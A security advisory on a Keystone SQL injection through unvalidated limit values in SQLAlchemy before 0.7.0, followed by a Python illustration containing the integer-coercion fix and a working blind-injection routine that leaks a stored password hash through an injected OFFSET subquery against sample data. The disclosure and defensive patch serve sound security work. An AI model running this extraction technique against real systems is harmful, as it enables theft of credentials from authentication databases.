Title: SQLAlchemy/Keystone SQL injection through limit handling
Impact: Critical
Reporter: Nikita Savin
Products: Keystone
Affects: All versions
Description:
Nikita Savin from GridDynamics reported a vulnerability in Keystone's usage of SQLAlchemy. Before version 0.7.0, SQLAlchemy did not validate the value supplied for the limit clause before rendering it into the generated SQL, so a non-numeric value ended up in the query text unchanged. Keystone passes the user-supplied limit straight to the SQLAlchemy call, which turns this into a SQL injection on vulnerable SQLAlchemy versions and can result in complete compromise of the authentication database. Only deployments running SQLAlchemy < 0.7.0 are affected.
Patch: The attached patch works around the issue in Keystone itself by coercing limit values to integer before they reach SQLAlchemy. Alternatively, the issue can be avoided by upgrading to SQLAlchemy >= 0.7.0.
Note: This could all be considered a vulnerability in SQLAlchemy, and a CVE assigned against that (silently-fixed) issue.
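The following is an added illustration of the two halves of the advisory, not code from Keystone or SQLAlchemy. The `unsafe_limit_sql` builder stands in for the pre-0.7.0 behaviour described above (an attacker-controlled limit rendered straight into the SQL text; this is a hypothetical rendering, not SQLAlchemy's own code), `coerce_limit` is the kind of integer coercion the patch applies, and `extract_password_via_limit` shows why a bare LIMIT injection is enough to read the authentication database: the injected OFFSET turns the row count into a yes/no oracle, leaking one character of a stored hash per correct guess. The table, rows and hash fragment are constructed sample data, and the rejection of negative limits is an assumption added here.

```python
import sqlite3

# Constructed sample data standing in for Keystone's user table; the
# "password" column holds a made-up hash fragment.
SAMPLE_USERS = [
    (1, "admin", "5f4dcc3b"),
    (2, "alice", "0a1b2c3d"),
]
HEX = "0123456789abcdef"


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER, name TEXT, password TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def unsafe_limit_sql(limit):
    """Hypothetical rendering of the pre-0.7.0 behaviour the advisory
    describes: the caller-supplied limit goes into the SQL text unchecked.
    Illustration only, not SQLAlchemy's own code."""
    return "SELECT id, name FROM user ORDER BY id LIMIT %s" % limit


def coerce_limit(limit):
    """The workaround from the advisory: coerce to int before the value
    reaches the query builder. Rejecting negatives is an added assumption."""
    value = int(limit)
    if value < 0:
        raise ValueError("limit must be non-negative")
    return value


def safe_limit_sql(limit):
    return "SELECT id, name FROM user ORDER BY id LIMIT %d" % coerce_limit(limit)


def list_users(conn, limit, builder=unsafe_limit_sql):
    return conn.execute(builder(limit)).fetchall()


def extract_password_via_limit(conn, user, length):
    """Blind extraction through the unsanitised LIMIT: the injected OFFSET
    evaluates to 0 when the guessed character is right (one row comes back)
    and to 99 when it is wrong (no rows), so the row count leaks one
    character per correct guess. Only the limit value is attacker-controlled."""
    recovered = ""
    for pos in range(1, length + 1):
        for ch in HEX:
            payload = (
                "1 OFFSET (SELECT CASE WHEN substr(password,%d,1)='%s' "
                "THEN 0 ELSE 99 END FROM user WHERE name='%s')" % (pos, ch, user)
            )
            if list_users(conn, payload):
                recovered += ch
                break
        else:
            raise RuntimeError("no candidate matched at position %d" % pos)
    return recovered


def safe_path_rejects(limit):
    """True when the coerced path refuses the value outright."""
    try:
        coerce_limit(limit)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(extract_password_via_limit(db, "admin", 8))   # leaks the stored hash
    print(safe_path_rejects("1 OFFSET (SELECT 0)"))     # True
```

The coercion is deliberately placed at the boundary where the request parameter is read, so every code path that builds a query sees an `int` rather than whatever string the client sent; a `ValueError` there should be turned into a 400 response rather than allowed to propagate.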